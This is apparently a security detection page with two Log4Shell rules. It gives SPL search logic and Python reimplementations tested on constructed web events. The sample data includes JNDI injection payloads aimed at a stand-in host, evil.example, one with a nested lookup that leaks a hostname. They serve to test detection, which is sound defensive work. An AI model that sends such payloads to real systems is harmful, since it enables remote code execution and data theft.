LoFP / If there is a vulnerability scanner looking for Log4Shell, this will trigger; otherwise it is likely to have low false positives.

Techniques

Sample rules

Log4Shell JNDI Payload Injection Attempt

Description

CVE-2021-44228 (Log4Shell) payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation looks similar to ${jndi:ldap://PAYLOAD_INJECTED}, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web data model and use the | from datamodel function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the ${jndi:ldap:// pattern across all potential web fields available in the raw data, such as HTTP headers. If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited.

Detection logic


| from datamodel Web.Web
| regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"
| fillnull
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user
| `log4shell_jndi_payload_injection_attempt_filter`
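The following is an added example, not Splunk's detection code: it reproduces the regex stage of the rule above in Python so the pattern can be exercised against sample events offline. The pattern is copied from the rule; the Web data model events are constructed placeholders (hosts, IPs and paths are invented), and the stats stage is mimicked with a plain Counter.

```python
import re
from collections import Counter

# The SPL pattern from the page, kept as written: a "jndi" token in any letter case,
# ':' or '/' (raw or URL-encoded), a protocol word, '://' (raw or URL-encoded), and
# an optional trailing ${...} lookup.
JNDI_PAYLOAD_RE = re.compile(
    r"[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"
)

# Constructed Web data model events (placeholders, not real traffic). _raw carries the
# whole logged request including headers, which is what the rule scans; the other
# fields are what the final stats stage groups on.
SAMPLE_WEB_EVENTS = [
    {"src": "10.0.0.5", "url": "/", "http_user_agent": "Mozilla/5.0",
     "_raw": 'src=10.0.0.5 method=GET uri="/" ua="Mozilla/5.0"'},
    # payload in the User-Agent header
    {"src": "10.0.0.6", "url": "/", "http_user_agent": "${jndi:ldap://evil.example/a}",
     "_raw": 'src=10.0.0.6 method=GET uri="/" ua="${jndi:ldap://evil.example/a}"'},
    # URL-encoded payload in the query string
    {"src": "10.0.0.7", "url": "/?q=%24%7Bjndi%3Aldap%3A%2F%2Fevil.example%2Fa%7D",
     "http_user_agent": "curl/7.68.0",
     "_raw": 'src=10.0.0.7 method=GET uri="/?q=%24%7Bjndi%3Aldap%3A%2F%2Fevil.example%2Fa%7D" ua="curl/7.68.0"'},
    # upper-case token and a nested ${...} lookup after "://" in X-Forwarded-For
    {"src": "10.0.0.8", "url": "/", "http_user_agent": "Mozilla/5.0",
     "_raw": 'src=10.0.0.8 method=GET uri="/" ua="Mozilla/5.0" x_forwarded_for="${JNDI:rmi://${hostName}.evil.example/x}"'},
    # the word "jndi" alone, without the lookup syntax, must not fire
    {"src": "10.0.0.9", "url": "/search?q=jndi", "http_user_agent": "Mozilla/5.0",
     "_raw": 'src=10.0.0.9 method=GET uri="/search?q=jndi" ua="Mozilla/5.0"'},
]


def detect_jndi_attempts(events):
    """Mimic `| regex _raw=...`: keep only events whose _raw matches the pattern."""
    return [e for e in events if JNDI_PAYLOAD_RE.search(e.get("_raw", ""))]


def stats_count_by(events, fields):
    """Mimic `| fillnull | stats count by ...`.

    Splunk's fillnull replaces missing fields with the string "0" by default, so
    absent fields are treated the same way here before grouping.
    """
    return Counter(tuple(e.get(f, "0") for f in fields) for e in events)


if __name__ == "__main__":
    hits = detect_jndi_attempts(SAMPLE_WEB_EVENTS)
    for key, count in stats_count_by(hits, ["src", "http_user_agent", "url_domain"]).items():
        print(count, key)
```

Three of the five constructed events fire (the raw, URL-encoded and upper-case/nested forms); the benign request and the request that merely contains the word "jndi" do not. The `url_domain` column comes out as "0" because the constructed events never set it, which is the fillnull behaviour the rule relies on to keep the grouping stable.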

Log4Shell JNDI Payload Injection with Outbound Connection

Description

CVE-2021-44228 (Log4Shell) payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation looks similar to ${jndi:ldap://PAYLOAD_INJECTED}, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we match the invocation function with a network connection to a malicious IP address.

Detection logic


| from datamodel Web.Web
| rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<affected_host>[a-zA-Z0-9\.\-\_\$]+)"
| join affected_host type=inner [
  | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest
  | `drop_dm_object_name(All_Traffic)`
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | rename dest AS affected_host]
| fillnull
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user
| `log4shell_jndi_payload_injection_with_outbound_connection_filter`
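The following is an added example, not Splunk's detection code: it reproduces the field extraction and inner join of the rule above in Python. Splunk's (?<name>...) capture groups are written as Python's (?P<name>...); the pattern is otherwise the one on the page. The Web events and Network_Traffic records are constructed placeholders (hosts, IPs and timestamps are invented), and the tstats subsearch is mimicked with a per-destination summary.

```python
import re

# The page's rex pattern with Python-style named groups: proto is the scheme word
# after the jndi token, affected_host is the host string after "://" (and after any
# nested ${...} lookup).
JNDI_HOST_RE = re.compile(
    r"[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?P<proto>\w+)(\:\/\/|\%3A\%2F\%2F)"
    r"(\$\{.*?\}(\.)?)?(?P<affected_host>[a-zA-Z0-9\.\-\_\$]+)"
)

# Constructed Web events (placeholders, not real traffic).
SAMPLE_WEB_EVENTS = [
    {"src": "10.0.0.6", "_raw": 'src=10.0.0.6 method=GET uri="/" ua="${jndi:ldap://evil.example/a}"'},
    {"src": "10.0.0.8", "_raw": 'src=10.0.0.8 method=GET uri="/" x_forwarded_for="${JNDI:rmi://${hostName}.evil.example/x}"'},
    {"src": "10.0.0.9", "_raw": 'src=10.0.0.9 method=GET uri="/?q=%24%7Bjndi%3Aldap%3A%2F%2Fquiet.example%2Fa%7D"'},
    {"src": "10.0.0.5", "_raw": 'src=10.0.0.5 method=GET uri="/" ua="Mozilla/5.0"'},
]

# Constructed Network_Traffic.All_Traffic records (epoch seconds; placeholders).
# The rule joins on the literal host string pulled from the payload, so a hostname in
# the payload only matches when All_Traffic.dest is logged in the same form; the
# search does no DNS resolution of its own.
SAMPLE_TRAFFIC = [
    {"_time": 1639130460, "src": "10.1.1.20", "dest": "evil.example", "dest_port": 1389},
    {"_time": 1639130400, "src": "10.1.1.20", "dest": "evil.example", "dest_port": 1389},
    {"_time": 1639130500, "src": "10.1.1.21", "dest": "198.51.100.7", "dest_port": 443},
]


def extract_payload_hosts(events):
    """Mimic `| rex field=_raw max_match=0 ...`.

    Splunk stores every match in multivalue fields; here each match becomes its own
    row carrying proto and affected_host. Events without a match are dropped by the
    later inner join anyway, so they are skipped here.
    """
    rows = []
    for e in events:
        for m in JNDI_HOST_RE.finditer(e.get("_raw", "")):
            rows.append({**e, "proto": m.group("proto"),
                         "affected_host": m.group("affected_host")})
    return rows


def summarize_outbound(traffic):
    """Mimic the tstats subsearch: count, firstTime and lastTime per All_Traffic.dest."""
    summary = {}
    for t in traffic:
        s = summary.setdefault(t["dest"], {"count": 0, "firstTime": t["_time"],
                                           "lastTime": t["_time"]})
        s["count"] += 1
        s["firstTime"] = min(s["firstTime"], t["_time"])
        s["lastTime"] = max(s["lastTime"], t["_time"])
    return summary


def join_with_outbound(events, traffic):
    """Mimic `| join affected_host type=inner [...]`.

    Only injection attempts whose payload host also appears as a destination in the
    network traffic summary survive, and each surviving row picks up that host's
    count, firstTime and lastTime.
    """
    summary = summarize_outbound(traffic)
    joined = []
    for row in extract_payload_hosts(events):
        hit = summary.get(row["affected_host"])
        if hit is not None:
            joined.append({**row, **hit})
    return joined


if __name__ == "__main__":
    for row in join_with_outbound(SAMPLE_WEB_EVENTS, SAMPLE_TRAFFIC):
        print(row["src"], row["proto"], row["affected_host"],
              row["count"], row["firstTime"], row["lastTime"])
```

Of the three constructed injection attempts, the two pointing at evil.example join against the two recorded flows to that host (first seen 1639130400, last seen 1639130460); the attempt pointing at quiet.example is extracted but dropped by the inner join because no outbound connection to it was observed, which is the extra evidence this rule adds over the plain injection-attempt rule.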